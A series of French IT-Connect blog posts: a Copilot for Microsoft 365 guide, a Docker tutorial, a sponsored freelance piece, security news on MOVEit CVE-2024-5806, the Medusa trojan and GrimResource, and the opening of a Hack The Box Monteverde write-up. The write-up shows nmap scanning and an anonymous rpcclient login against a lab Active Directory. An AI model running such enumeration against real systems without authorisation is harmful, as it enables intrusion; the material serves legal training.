De plus, les utilisateurs pourront retrouver Copilot au sein des applications Microsoft 365, que ce soit Word, Excel, PowerShell, Outlook, OneNote, Loop, etc.... L'IA est directement intégrée à ces applications, donc il n'est pas toujours nécessaire d'accéder aux interfaces dédiées.

Remarque : votre historique de conversations avec Copilot est accessible sur vos différents appareils (liés à votre compte Microsoft) et via les différents portails de conversation avec Copilot.

V. Comment rédiger un prompt Copilot ?

Les prompts ou les invites sont la façon dont vous demandez à Copilot for Microsoft 365 de faire quelque chose pour vous. Que ce soit la rédaction d'un e-mail, la création d'un document, etc... Pour obtenir une réponse conforme à ses attentes, il est important de travailler la façon dont un prompt est rédigé. Les consignes doivent être claires et précises pour que la réponse de l'IA le soit également, tout en utilisant un langage simple.

Un prompt est constitué de 4 éléments clés :

  • Un but, un objectif : L'action à effectuer (rédiger, résumer, traduire, etc...) et quelle réponse attendez-vous de Copilot ? Une liste de 5 points clés ? Une seule phrase ? Un paragraphe ? Dites-lui.
  • Un contexte : pourquoi en avez-vous besoin ? Pour qui est destiné le résultat ?
  • Une source d'information : où se situe l'information ? S'agit-il d'un e-mail, d'un document ? Sur quelle période ?
  • Vos attentes : à qui s'adresse-t-on ? Faut-il tutoyer ou vouvoyer le destinataire ? Faut-il utiliser un langage simple ou soutenu ? Etc.

Parfois, il n'est pas nécessaire de préciser tous les éléments, tout dépend de la complexité de la requête. Ceci vous donne une idée des éléments à inclure, de façon naturelle, lors de la rédaction d'un prompt. Donnez un maximum de détails sur vos attentes, car Copilot ne peut pas lire dans vos pensées... De plus, veillez à utiliser des guillemets pour bien préciser à Copilot ce qu'il doit reformuler / traduire / remplacer, etc... à votre place.

VI. 7 exemples pour débuter avec Copilot for Microsoft 365

Dans la suite de l'article, nous allons évoquer différents exemples d'utilisation de Copilot for Microsoft 365. Il s'agit de cas d'usage qui auront une valeur individuelle pour l'utilisateur et qui pourront lui permettre de gagner plusieurs dizaines de minutes par jour.

Certains cas d'usage s'adressent à tous les utilisateurs, tandis que d'autres sont adaptés à un contexte métiers, ce qui montre que Copilot peut être utilisé par l'IT, la finance, le marketing, le secrétariat ou encore la comptabilité.

Cas d'usage pour tous :

  • Rédiger un nouvel e-mail dans Outlook
  • Trouver facilement un document interne ou une information
  • Obtenir le résumé d'une réunion Teams ou d'un document

Cas d'usage "métiers" :

  • Créer une fiche de description de poste d'administrateur système
  • Créer une FAQ sur les problèmes d'accès à Internet
  • Rédiger une fiche produit
  • Rédiger un post LinkedIn pour partager une offre d'emploi ou évoquer un événement
  • Obtenir une synthèse d'un document technique

A. Résumer un document Word

Pour ce premier exemple, nous allons demander à Copilot de résumer un document Word. Le document Word en question, c'est cet article sans les différents exemples tel que celui-ci. Il suffit d'ouvrir le document dans Word et de solliciter Copilot. Par exemple, voici le prompt qu'il est possible d'utiliser "Résumer ce document en 5 points clés". Ainsi, Copilot va analyser le document et retourner une liste de 5 points clés.

Pour chaque point clé, Copilot indique ses références, c'est-à-dire les parties du document associées. Il suffit de cliquer sur un numéro pour que la partie du document correspondante, et faisant office de source, soit mise en évidence. C'est très pratique pour en savoir plus.

Par ailleurs, sachez que si vous partez d'une feuille blanche, Copilot est là aussi pour vous assister. Il peut également rédiger un texte en s'appuyant sur l'un de vos documents en tant que source.

Copilot pour Word - Créer un document

B. Générer une présentation PowerPoint

Désormais, nous allons solliciter Copilot dans PowerPoint pour lui demander une présentation complète à partir d'un document Word. En l'occurrence, il s'agit du même document que celui utilisé pour l'exemple précédent. À partir d'un nouveau document Word, il suffit de demander à Copilot : "Créer une présentation à partir d'un fichier /nom du fichier".

Ici, l'utilisation du "/" permet de faire référence à un élément externe, et donc de sélectionner ce fameux document hébergé sur le OneDrive de l'utilisateur. Il n'y a pas de bouton "Parcourir", donc Copilot doit pouvoir accéder directement au document.

Quelques secondes plus tard, une présentation de 12 pages a été générée à partir de ce document avec 6 pages de texte et quelques images. Copilot a eu l'excellente idée de reprendre certaines images présentent dans le document source.

Voici un aperçu de quelques-unes des slides créées par Copilot, sans aucune modification de ma part. Même si le thème visuel est à revoir, certaines slides sont déjà bien fournies et plutôt bien mise en forme.

C. Rédiger un nouvel e-mail

Copilot dans Outlook est également là pour vous assister dans la rédaction d'e-mail, la reformulation ou encore pour résumer une conversation. Dans ce premier exemple, nous allons solliciter Copilot pour rédiger un e-mail. Voici le prompt en question "Rédiger un nouvel e-mail à Guy Mauve pour lui demander si le client Contoso a effectué le règlement de la facture 2024-10. Faire un message bref et vouvoyer le destinataire."

Ici, il est intéressant de noter que "Guy Mauve" a été sélectionné via le "/" à partir de la liste des contacts. Ainsi, Copilot peut effectuer une recherche plus précise. L'e-mail généré est conforme à la demande initiale et peut être envoyé en l'état !

Copilot pour Outlook - Rédiger un e-mail

À l'approche des congés d'été, Copilot pourrait aussi vous aider à écrire un e-mail d'absence original !

D. Résumer un fil d'e-mails

Vous avez oublié une information au sujet de l'une de vos conversations par e-mail ? Ou, vous avez simplement perdu le fil de la conversation ? Demandez à Copilot de vous faire un résumé ! Ici, Copilot est sollicité pour obtenir un résumé des échanges entre moi-même et Guy Mauve au sujet de la fameuse facture 2024-10. Il y a 5 e-mails au total dans cet échange.

Pour obtenir un résumé, il suffit de cliquer sur le bouton "Résumer" présent dans l'interface d'Outlook, au-dessus de la conversation. Ci-dessous, un aperçu du résultat obtenu, conforme à la réalité de l'échange.

Copilot pour Microsoft 365 - Outlook - Résumer un échange d'e-mails

E. Rédiger un post pour les réseaux sociaux

Copilot est capable de rédiger du texte sur une grande majorité de sujets et dans différents formats : e-mails, communiqué de presse, courrier officiel, ou encore post LinkedIn et Instagram. À titre d'exemple, nous allons lui demander de rédiger un post LinkedIn pour partager une offre d'emploi.

Voici le prompt utilisé : "Rédiger un post LinkedIn pour partager la nouvelle offre d'emploi d'administrateur système de l'entreprise IT-Connect. Le texte doit être dynamique et contenir des émojis.". Le résultat est une bonne base à peaufiner avant la publication !

F. Rechercher des documents avec Copilot

La recherche de documents et d'informations est une tâche fastidieuse et qui peut très rapidement demander plusieurs minutes... Surtout si les documents ne sont pas correctement organisés, ou tout simplement, s'ils sont trop nombreux. Copilot peut vous aider à rechercher rapidement un ou plusieurs documents, en fonction de critères de recherche que vous lui fournissez.

Dans le cas présent, voici le prompt utilisé : "Rechercher sur le SharePoint, un document faisant référence à Microsoft Entra ID et Intune.". Copilot a retourné 2 documents : un document PDF qui est bien celui que je recherchais, et un document PDF qui ne m'intéresse pas dans le cas présent. D'ailleurs, Copilot lui-même à des doutes et nous fait comprendre que le résultat est moins pertinent.

La section "Références" contient la liste des documents : il suffit de cliquer sur le nom d'un document pour l'ouvrir. Efficace.

Recherche de documents avec Copilot

G. Analyser et modifier un fichier Excel

L'intégration de Copilot dans Excel permet d'analyser les données, de créer des graphes, des tableaux dynamiques ou encore d'ajouter de nouvelles colonnes avec des formules créées par l'IA. Différents boutons sont accessibles, sans qu'ils soient accessibles de systématiquement rédiger un prompt.

Copilot peut vous fournir un ensemble d'insights, c'est-à-dire d'indicateurs clés, à partir des données du classeur. C'est un bon moyen de générer un ensemble de graphes très rapidement, et ainsi voir les tendances. Ci-dessous, un exemple de graphes générés par l'IA à partir du tableau initial.

Copilot pour Excel - Insights

VI. Conclusion

Pour que l'adoption de Copilot par les utilisateurs soit une réussite, ils doivent maitriser ce nouvel outil. Cela signifie qu'ils doivent avoir la maitrise du "prompting" et des fonctionnalités de l'IA afin de pouvoir gagner un maximum de temps au quotidien. Microsoft en a conscience puisque Copilot est là pour vous guider, pour vous donner des idées, autant qu'il vous laisse la liberté d'écrire le prompt à votre façon.

Pour réussir votre transition vers Copilot et gagner en productivité, vous avez deux options : acheter vous-même les licences de façon autonome et vous débrouiller, ou acheter les licences via un partenaire d'Arrow et bénéficier d'un réel accompagnement.

En complément de tous les exemples présentés dans cet article, nous vous invitons à accéder au site "Copilot Lab" où vous pourrez trouver de nombreux exemples, notamment par application, ainsi que cette bibliothèque de prompts proposée par Microsoft.

Cet article intègre une communication commerciale.

The post Prise en main de l’IA « Copilot pour Microsoft 365 » first appeared on IT-Connect.

Comment supprimer un conteneur Docker en ligne de commande ?

I. Présentation

Dans ce tutoriel, nous allons voir comment supprimer un conteneur Docker en ligne de commande. La suppression des conteneurs Docker inutilisés est une bonne pratique qui permet de libérer de l'espace sur un système et de mieux s'organiser en nettoyant les éléments obsolètes et non nécessaires.

Nous vous montrerons comment réaliser cette opération en ligne de commande sur un système Linux, avec des options qui peuvent également être utilisées sur un système d'exploitation Windows.

Pour rappel, dans l'environnement Docker, un conteneur (également appelé container) est une instance d'une image Docker. Il est important de noter que la suppression d'une image et celle d'un conteneur sont deux opérations distinctes qui ne s'effectuent pas avec les mêmes options ou commandes.

Dans tous les cas, avoir accès avec les permissions nécessaires à l'utilisation de la commande "docker" est nécessaire pour suivre ce tutoriel.

II. Supprimer un conteneur Docker

A. Lister les conteneurs

La première chose à faire lorsque l'on souhaite supprimer un conteneur Docker est de lister les conteneurs actifs. Cela peut être réalisé à l'aide de la commande suivante :

# Lister les conteneurs Docker actifs
docker ps

CONTAINER ID   IMAGE     COMMAND                  CREATED         STATUS         PORTS                                   NAMES                                
9d4655d15753   nginx     "/docker-entrypoint.…"   4 minutes ago   Up 4 minutes   0.0.0.0:8080->80/tcp, :::8080->80/tcp   nginx1                               
0bdfaca3f7ae   nginx     "/docker-entrypoint.…"   6 minutes ago   Up 6 minutes   80/tcp                                  recursing_banach 

Ici, nous voyons différents conteneurs Docker en cours d'exécution (notez bien le "CONTAINER ID" et le "NAME"). Une fois que l'on a identifié celui que l'on souhaite supprimer, il est nécessaire de l'arrêter via la commande suivante :

# Stopper un conteneur actif (via son nom ou ID)
docker stop <NAME>
docker stop <CONTAINER ID>

# Exemple :
docker stop nginx1
docker stop 9d4655d15753

À noter que le "container ID" peut être utilisé au même titre que le nom du conteneur. L'avantage d'utiliser le nom est que Docker propose une autocomplétion pour faciliter la saisie (utilisez la touche "Tab" après avoir saisi les premières lettres).

Si vous ne stoppez pas le conteneur avant de le supprimer, vous risquez de vous retrouver avec une erreur "Error response from daemon: You cannot remove a running container" :

Suite à cette première manipulation ou si le conteneur que vous souhaitez supprimer était déjà inactif, vous pourrez le voir dans vos conteneurs inactifs via l'option "-a" de "docker ps" :

# Lister les conteneurs Docker inactifs
docker ps -a 

À nouveau, vous vous retrouvez avec une liste des conteneurs Docker inactifs (mais toujours bien existant) sur votre système.

B. Supprimer un conteneur Docker inactif

Nous allons maintenant voir comment supprimer les conteneurs Docker que nous venons de lister. À nouveau, il faut avoir sous la main le nom ou l'ID du conteneur à supprimer :

# Supprimer un conteneur Docker 
docker rm <NOM>
docker rm <ID>

# Exemple :
docker rm nginx1
docker rm 9d4655d15753

C'est aussi simple que ça, attention cependant, la commande de suppression est souvent confondue avec la commande "rmi", qui elle, sert à supprimer des images.

III. Options avancées de suppression

A. Supprimer plusieurs conteneurs Docker en une commande

Il est possible de supprimer plusieurs conteneurs d'un seul coup, cela très simplement en enchainant leur nom ou ID les uns à la suite des autres, comme ceci :

# Supprimer plusieurs conteneurs d'un seul coup
docker rm <NOM> <NOM> <ID>

# Exemple
docker rm nginx1 nginx2 9d4655d15753

Cela permet d'aller beaucoup plus vite si l'on a plusieurs conteneurs à supprimer, notamment avec la tabulation sur le nom des conteneurs.

B. Forcer la suppression d'un conteneur actif

Nous avons vu plus haut que la suppression d'un conteneur Docker en cours d'exécution n'était pas possible et que cela renvoyait une erreur. Il nous est toujours possible de forcer cette suppression.

Attention cependant, il est conseillé d'utiliser cette option uniquement en cas de problème concernant le conteneur, comme l'impossibilité de le stopper proprement. La suppression d'un conteneur actif est en temps normale déconseillée pour les raisons suivantes :

  • Risque d'erreur : une autocomplétion incorrecte peut facilement conduire à la suppression du mauvais conteneur, surtout si l'on a l'habitude d'utiliser l'option "-f" de manière systématique.
  • Risque de corruption des données : en forçant la suppression d'un conteneur, vous risquez de laisser des fichiers ou des ressources système non libérés, ce qui peut entraîner une corruption des données ou des incohérences dans l'environnement Docker. Ainsi, si le conteneur supprimé travaille avec d'autres conteneurs sur le système (au niveau réseau ou via des volumes), sa suppression peut avoir un impact sur ces autres conteneurs.

La suppression forcée d'un conteneur Docker actif passe par l'option "-f" :

# Forcer la suppression d'un conteneur docker actif
docker rm <NAME/ID> -f

En règle générale, il reste toutefois recommandé d'arrêter correctement un conteneur avant de le supprimer, en utilisant la commande "docker stop" pour arrêter ses processus de manière ordonnée.

C. Supprimer les volumes

Attention cependant, la suppression d'un conteneur Docker n'entraine pas la suppression de l'image depuis laquelle il a été instancié, ni les potentiels volumes qu'il utilisait ! Si vous souhaitez que les volumes associés au conteneur Docker soient également supprimés, vous pouvez utiliser l'option "-v" :

# Supprimer un conteneur Docker et ses volumes
docker rm <NAME/ID> -v

Encore une fois, attention à l'impact potentiel sur d'autres conteneurs si le volume est utilisé par plusieurs conteneurs Docker.

IV. Conclusion

Dans ce tutoriel, nous avons vu comment supprimer des conteneurs Docker en utilisant différentes commandes et options. La suppression régulière des conteneurs inutilisés permet de libérer des ressources système et de garder un environnement Docker propre et performant. En appliquant les bonnes pratiques de maintenance, vous pouvez simplifier la gestion de vos conteneurs et optimiser votre flux de travail.

The post Comment supprimer un conteneur Docker en ligne de commande ? first appeared on IT-Connect.

Devenir freelance informatique sans entreprise, est-ce possible ?

Quand on se lance en freelance, il existe deux grandes étapes importantes : sauter le pas pour la première fois dans l’indépendance, et le choix du statut juridique sous lequel exercer. Si la création d’entreprise est encore aujourd’hui l’option la plus répandue, elle perd peu à peu du terrain face aux nouvelles options qui s’offrent aux freelances informatiques. Explications.

Doit-on créer une société pour devenir freelance informatique ?

Le freelancing est un mode de vie indépendant, et non pas un statut juridique. Il implique de pouvoir travailler à son compte pour le ou les clients de son choix, sans hiérarchie ni contrainte de temps. Pour exercer comme freelance, il faut cependant une structure juridique, comme une micro-entreprise, une SARL unipersonnelle (anciennement EURL) ou une SASU. Chacun de ces types d’entreprises correspondant aux besoins et au chiffre d'affaires de chaque freelance.

Que vous soyez dans l’informatique, la tech ou l’IT, voler de ses propres ailes implique de grandes responsabilités, notamment à cause de la création et la gestion de sa propre entreprise. En effet, les contraintes sont souvent nombreuses (comptabilité, administratif, TVA…) et les coûts annexes souvent négligés (CFE, mutuelle, assurances pro, retraite, prévoyance…), pouvant décourager de nombreux consultants qui désiraient simplement reprendre leur vie professionnelle en main.

Fort heureusement, il est aujourd’hui possible de travailler en freelance sans devoir créer d’entreprise ou de micro-entreprise. Voici deux solutions : le portage salarial et son alternative la gestion d’activité pour les freelances informatique.

Comment devenir freelance informatique sans entreprise ?

Nous l’avons vu, cette liberté de l’indépendance pour les nouveaux freelances informatiques vient avec son lot de démarches administratives, légales, fiscales, comptables et financières. En effet, pour exercer comme consultant indépendant, les freelances doivent généralement créer et piloter leur propre entreprise, via une EURL ou une SASU, le statut de micro-entrepreneur étant souvent trop limité. La gestion d'une entreprise requiert des consultants un investissement mensuel conséquent, en plus des nombreux frais annexes tels que la mutuelle santé, la CFE (taxe foncière des entreprises), les cotisations retraite, la prévoyance, les assurances professionnelles, etc.

La bonne nouvelle, c’est qu’il est possible de devenir freelance informatique sans entreprise. Deux options appréciées des freelances informatiques : le portage salarial et la gestion d'activité. Deux options similaires sur le fonctionnement, mais proposant quelques différences en fonction des besoins de chaque freelance. Par exemple, la gestion d'activité est une approche souvent plus complète pour les freelances dans l'informatique qui cherchent à s’affranchir du salariat tout en gardant un maximum ses avantages.

Le portage salarial pour les freelances informatiques

Pour se lancer comme freelance informatique sans créer d'entreprise, le portage salarial est une solution largement répandue depuis quelques années. Le principe est très simple : l’entreprise de portage devient l'intermédiaire entre le consultant et ses clients, gérant la facturation et les aspects administratifs côté client, et signant un CDI côté consultant. Cela permet au freelance de bénéficier du statut de salarié tout en conservant son indépendance, mais aussi la liberté de démarcher ses propres clients.

Le portage permet aux indépendants d’éviter ainsi toute charge administrative et comptable. Et comme les freelances bénéficient d’un CDI, ils profitent des avantages habituellement réservés aux salariés : mutuelle complémentaire, cotisation et droit au chômage, retraite du régime général…

La gestion d'activité : l’alternative idéale au portage dans l’informatique

Afin de proposer des services complémentaires et additionnels au portage, une nouvelle solution innovante a vu le jour : la gestion d’activité. En proposant un accompagnement dédié aux freelances informatique et ingénieurs web, Hightekers répond aux nouveaux besoins des consultants informatiques qui désirent combiner indépendance et liberté, sans les contraintes de la gestion d’une entreprise.

En plus des avantages habituels du portage salarial, Hightekers propose des bénéfices généralement réservés aux salariés de grandes entreprises : plans d’épargne, notes de frais, voiture de location, places en crèches, primes sur résultat, revenus complémentaires liés à la cooptation de nouveaux collaborateurs, etc.

Mais ce n’est pas tout, Hightekers réunit les consultants de la tech, l’IT et l’informatique au sein d’un réseau puissant et dynamique. Les membres ont alors la possibilité d'échanger entre eux, de se recommander mutuellement à leurs clients respectifs et de partager des opportunités de missions. Ce réseau de plusieurs milliers de freelances IT en France et à l’international est donc un vrai boost pour leur carrière.

En effet, les membres jouent un rôle actif en recommandant de nouveaux consultants auprès des grandes ESN et entreprises internationales. Ils améliorent aussi leurs revenus grâce à un système de commissions basées sur le chiffre d'affaires généré par les membres qu'ils ont recommandés.

Enfin, Hightekers permet aux freelances informatiques de travailler d’où ils veulent en Europe et dans le monde, sans devoir changer de structure. Ainsi, les freelances IT peuvent s’installer dans le pays de leur rêve tout en gardant leurs clients, qu’ils soient en France ou eux-aussi à l’étranger. Grâce à un contrat de travail local fourni par l’antenne locale d’Hightekers, leur vie sur place est largement simplifiée !

Conclusion

La bonne nouvelle, c’est qu’il est bien possible d’être freelance en informatique sans avoir à créer d’entreprise grâce à la gestion d’activité. Les consultants IT se libèrent ainsi des préoccupations comptables et administratives liées à leur activité d’indépendant, et peuvent se concentrer à 100% sur leurs missions. Et grâce à une entreprise de gestion d'activité internationale, les freelances profitent d’un réseau solide pour dynamiser leur carrière partout dans le monde.

Article sponsorisé.

The post Devenir freelance informatique sans entreprise, est-ce possible ? first appeared on IT-Connect.

Nouvelle faille critique dans MOVEit Transfer : les pirates cherchent déjà à l’exploiter !

Une nouvelle faille de sécurité majeure a été découverte et patchée dans l'application MOVEit Transfer ! Moins de 24 heures après la divulgation de cette vulnérabilité, les cybercriminels tentent déjà de l'exploiter ! Faisons le point.

Rappel : l'éditeur Ipswitch (dont la maison mère est Progress) commercialise l'application MOVEit Transfer, utilisée par les entreprises pour partager des données de manière sécurisée avec d'autres partenaires ou clients, que ce soit en HTTP, SCP ou SFTP. Cette application est disponible en mode SaaS et elle peut être aussi déployée en local sur l'infrastructure de l'entreprise.

Il y a environ un an, plusieurs failles de sécurité avaient été découvertes et corrigées dans MOVEit Transfer. Tout au long de l'année, différents groupes de cybercriminels (dont le ransomware Clop) ont exploité ces vulnérabilités pour compromettre le réseau des organisations : Sony, Siemens Energy, CCleaner, etc... La liste de victimes est très longue. Espérons que cette fois-ci, ce ne soit pas aussi catastrophique.

Associée à la référence CVE-2024-5806, la nouvelle faille de sécurité permet à un attaquant d'outrepasser le processus d'authentification du module SFTP de MOVEit Transfer. Ce dernier étant nécessaire pour effectuer des transferts de fichiers par l'intermédiaire du protocole SSH. L'exploitation de cette vulnérabilité donne l'opportunité à l'attaquant de lire les fichiers hébergés sur le serveur MOVEit Transfer, et même de modifier ou supprimer ces données, ainsi que d'en charger de nouvelles.

2 700 serveurs MOVEit Transfer potentiellement vulnérables

Le bulletin de sécurité de Progress pour cette faille de sécurité critique a été publié le 25 juin 2024. Moins de 24 heures plus tard, il y a déjà un rapport technique complet disponible sur le site de watchTowr, ainsi qu'un exploit PoC disponible sur GitHub. De son côté, The Shadowserver Foundation affirme sur X (Twitter) avoir observé des tentatives d'exploitation de cette vulnérabilité.

Un rapport de Censys évoque le nombre de serveurs MOVEit Transfer exposés sur Internet, et donc, potentiellement vulnérables : environ 2 700 serveurs. Un chiffre qui évolue légèrement chaque jour. Autant de serveurs qui doivent se protéger de la CVE-2024-5806.

"La majorité des instances MOVEit exposées que nous avons observées se trouvent aux États-Unis, mais d'autres expositions ont été observées au Royaume-Uni, en Allemagne, aux Pays-Bas et au Canada, et dans d'autres pays.", peut-on lire dans le rapport.

Voici la carte globale de Censys :

Serveurs MOVEit Transfer - Alerte CVE-2024-5806

Comment se protéger de la CVE-2024-5806 ?

Avant de parler du correctif, parlons des versions vulnérables. À ce sujet, Progress précise : "Ce problème affecte MOVEit Transfer : de 2023.0.0 à 2023.0.11, de 2023.1.0 à 2023.1.6, de 2024.0.0 à 2024.0.2."

Voici la liste des versions comprenant ce correctif :

  • MOVEit Transfer 2023.0.11
  • MOVEit Transfer 2023.1.6
  • MOVEit Transfer 2024.0.2

Si vous ne pouvez pas patcher dès maintenant, limitez les flux entrants et sortants sur le serveur MOVEit Transfer afin d'autoriser uniquement les hôtes de confiance à se connecter.

Source

The post Nouvelle faille critique dans MOVEit Transfer : les pirates cherchent déjà à l’exploiter ! first appeared on IT-Connect.

Le Trojan bancaire Medusa cible les utilisateurs d’Android dans 7 pays, dont la France

Utilisateurs d'Android, sachez que le Trojan bancaire Medusa est de retour ! De nouvelles campagnes d'attaques ont été repérées, notamment en France, au Canada et aux États-Unis. Faisons le point sur cette menace.

Le Trojan bancaire Medusa

En mai 2024, l'équipe Threat Intelligence de Cleafy a repéré de nouvelles campagnes malveillantes impliquant le Trojan bancaire Medusa, connu également sous le nom de TangleBot. Ce Cheval de Troie bancaire est de retour, après avoir été inactif pendant près d'un an. Il est accessible sous la forme d'un Malware-as-a-Service pour Android, donc les affiliés peuvent l'utiliser à des fins malveillantes en payant un abonnement.

Découvert en 2020, Medusa est capable de réaliser plusieurs opérations sur les appareils infectés, dont l'enregistrement de la saisie au clavier (keylogger), le contrôle de l'écran et la capacité de lire/écrire des SMS. Ce dernier point est important puisque dans le cadre de sa stratégie de distribution, le malware pourra accéder à la liste des contacts et envoyer des SMS.

Les chercheurs en sécurité expliquent que la nouvelle version de Medusa nécessite moins de permissions sur l'appareil Android infecté pour fonctionner. Désormais, le strict minimum pour les opérations de base est requis. De nouvelles fonctionnalités ont aussi été ajoutées, comme la possibilité de désinstaller des applications à distance et de prendre une copie d'écran. Cette fonction s'avère précieuse pour les pirates afin de voler des informations sensibles.

5 botnets actifs

Le rapport de Cleafy évoque un ensemble de 24 campagnes malveillantes menées par les pirates, depuis juillet 2023. En effet, ce rapport propose un historique de l'activité de Medusa sur les 12 derniers mois, ce qui sous-entend que sa phase d'inactivité est plus ancienne.

Ces campagnes malveillantes ont été associées 5 botnets actifs différents, que l'on peut distinguer par les types de leurres utilisés, la stratégie de distribution de la souche malveillante et les cibles géographiques.

Voici le nom des applications malveillantes utilisées par Medusa. Le choix du nom d'application "4K Sports" n'est surement pas un hasard puisque l'EURO 2024 de football se déroule actuellement.

Source : Cleafy

"Nous avons identifié cinq botnets différents, exploités par plusieurs affiliés, qui présentent des caractéristiques distinctes en ce qui concerne le ciblage géographique et les leurres utilisés. Les résultats confirment des cibles nationales déjà connues, comme la Turquie et l'Espagne, mais aussi de nouvelles, comme la France et l'Italie.", peut-on lire dans le rapport.

Le Trojan bancaire Medusa est à suivre de près puisqu'il semble monter en puissance, tout en devenant plus furtif. Son nombre d'affiliés pourrait augmenter de façon importante, ce qui aurait également un impact sur la quantité de victimes.

Source

The post Le Trojan bancaire Medusa cible les utilisateurs d’Android dans 7 pays, dont la France first appeared on IT-Connect.

Cyberattaque : les pirates exploitent des fichiers MSC et une faille XSS non corrigée dans Windows !

Une nouvelle technique d'attaque baptisée "GrimResource" cible actuellement les utilisateurs de Windows ! Elle s'appuie sur l'utilisation de fichiers MSC et elle exploite une faille de sécurité XSS dans Windows non corrigée à ce jour. Faisons le point sur cette menace.

Au fil des années, Microsoft renforce la sécurité de son système d'exploitation et de ses applications en désactivant par défaut certaines fonctionnalités. Nous pouvons notamment citer la désactivation des macros dans Microsoft Office, ainsi que la suppression à venir de VBScript dans Windows. À chaque fois, les cybercriminels font preuve d'ingéniosité pour trouver de nouvelles techniques d'attaques, et sans cesse se renouveler.

Dernièrement, l'entreprise sud coréenne Genian a découvert que les fichiers MSC pouvaient être utilisés à des fins malveillantes. De nouvelles recherches menées par l'équipe d'Elastic ont permis de découvrir une nouvelle technique basée sur l'utilisation de ces fameux fichiers MSC : la technique "GrimResource". "Les chercheurs d'Elastic ont découvert une nouvelle technique d'infection exploitant également les fichiers MSC, que nous appelons GrimResource.", peut-on lire.

En tant qu'administrateur système Windows, vous connaissez surement les fichiers MSC correspondant à "Microsoft Management Console", soit la console MMC. Les fichiers MSC sont des raccourcis vers des consoles d'administration du système, comme "gpedit.msc" pour éditer la stratégie de groupe locale. L'utilisateur peut créer ses propres raccourcis, et les pirates aussi.

Évoquons l'utilisation malveillante des fichiers MSC sur Windows. Tout d'abord, le rapport d'Elastic précise : "Il permet aux attaquants d'obtenir une exécution complète du code dans le contexte de mmc.exe après qu'un utilisateur ait cliqué sur un fichier MSC spécialement conçu. Un échantillon exploitant GrimResource a été téléchargé pour la première fois sur VirusTotal le 6 juin." - L'échantillon en question s'appelait "sccm-updater.msc".

Une faille de sécurité XSS non corrigée dans la dernière version de Windows 11

L'attaque GrimResource repose sur l'utilisation d'un fichier MSC malveillant qui sert à exploiter une faille de sécurité XSS basée sur le modèle DOM de la bibliothèque nommée "apds.dll". Il s'agit d'une vulnérabilité connue, qui a déjà été reportée à Adobe et Microsoft en 2018, mais qui n'a pas été corrigée. Ainsi, dans Windows 11, avec les dernières mises à jour de sécurité, la faille de sécurité peut être exploitée. Ceci est également vrai pour les autres versions de Windows.

"En ajoutant une référence à la ressource APDS vulnérable dans la section StringTable appropriée d'un fichier MSC élaboré, les attaquants peuvent exécuter du JavaScript arbitraire dans le contexte de mmc.exe.", peut-on lire. Grâce à cette technique et à l'exploitation de cette faille de sécurité, les cybercriminels sont parvenus à récupérer et à exécuter un payload Cobalt Strike, afin d'infecter la machine et de la compromettre.

Une vidéo de démonstration a été publiée sur X (Twitter) :

Elastic Security Labs has discovered a new method for initial access and evasion in the wild, termed #GrimResource, which involves arbitrary execution in mmc.exe through a crafted MSC file.https://t.co/q4u4gTPE6Ohttps://t.co/usWJvhygIC pic.twitter.com/hQF4gKktX2

— Samir (@SBousseaden) June 21, 2024

Nous vous invitons à lire le rapport d'Elastic pour obtenir des détails supplémentaires, et notamment des informations sur la façon de détecter cette attaque. Par exemple, l'exécution du processus "mmc.exe" avec l'appel d'un fichier "msc" et de certains arguments doit être considéré comme suspect. Elastic a aussi partagé la règle YARA correspondante.

Source

The post Cyberattaque : les pirates exploitent des fichiers MSC et une faille XSS non corrigée dans Windows ! first appeared on IT-Connect.

Compromission Active Directory – Le cas de la Box Monteverde de Hack The Box

I. Présentation

Dans cet article, je vous propose la résolution de la machine Hack The Box Monteverde, de difficulté "Medium". Cet exercice vous montrera un exemple très concret et plutôt réaliste de compromission d'un Active Directory et donc d'un domaine dans un réseau d'entreprise.

Hack The Box est une plateforme en ligne qui met à disposition des systèmes vulnérables appelées "box". Chaque système est différent et doit être attaqué en adoptant la démarche d'un cyberattaquant. L'objectif est d'y découvrir les vulnérabilités qui nous permettront de compromettre les utilisateurs du système, puis le compte root ou administrateur.

Ces exercices permettent de s’entraîner légalement sur des environnements technologiques divers (Linux, Windows, Active directory, web, etc.), peuvent être utiles pour tous ceux qui travaillent dans la cybersécurité (attaquants comme défenseurs) et sont très formateurs 🙂

Je vais ici vous détailler la marche à suivre pour arriver au bout de cette box en vous donnant autant de conseils et ressources que possible. N'hésitez pas à consulter les nombreux liens qui sont présents dans l'article.

Cette solution est publiée en accord avec les règles d'HackThebox et ne sera diffusée que lorsque la box en question sera indiquée comme "Retired".

Technologies abordéesWindows, Active Directory, Azure/Entra ID, Azure AD Connect
Outils utilisésnmap, rpcclient, smbmap, evil-winrm, AdDecrypt.exe

Retrouvez tous nos articles Hack The Box via ce lien :

II. Résolution de la box Monteverde

A. Découverte et énumération

Pour l'instant, nous ne disposons que de l'adresse IP de notre cible. Commençons par un scan réseau à l'aide de l'outil nmap pour découvrir les services exposés sur le réseau, et pourquoi pas leurs versions.

Technique d'attaque (MITRE ATT&CK) : T1046 - Network Service Discovery

$ nmap -sC -sV -T4 --max-retries 1 10.10.10.172 --open -Pn
PORT     STATE SERVICE       VERSION
53/tcp   open  domain?
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-03-25 10:31:23Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped

Les services exposés sont caractéristiques d'un Active Directory. En ce qui concerne l'énumération, la phase de reconnaissance et toutes celles qui suivent, on peut se baser sur différentes méthodologies. Néanmoins, je vous recommande celle construite et publiée par Orange Cyberdéfense au travers son AD Mindmap : Orange Cyberdefense AD Mindmap.

Retrouvez notre cours complet sur Nmap sur lien suivant :

Parmi les premiers éléments à analyser sur tout service et tout système : l'authentification anonyme !

Technique d'attaque (MITRE ATT&CK) : T1110.001 - Brute Force: Password Guessing

$ sudo rpcclient -U "%" 10.10.10.172

Le service RPC est vulnérable à l'authentification anonyme. Il faut savoir que sur un Active Directory, le service RPC peut être utilisé notamment pour récupérer la liste complète des utilisateurs, plutôt intéressant pour un attaquant qui n'avait jusque-là aucune information sur sa cible :

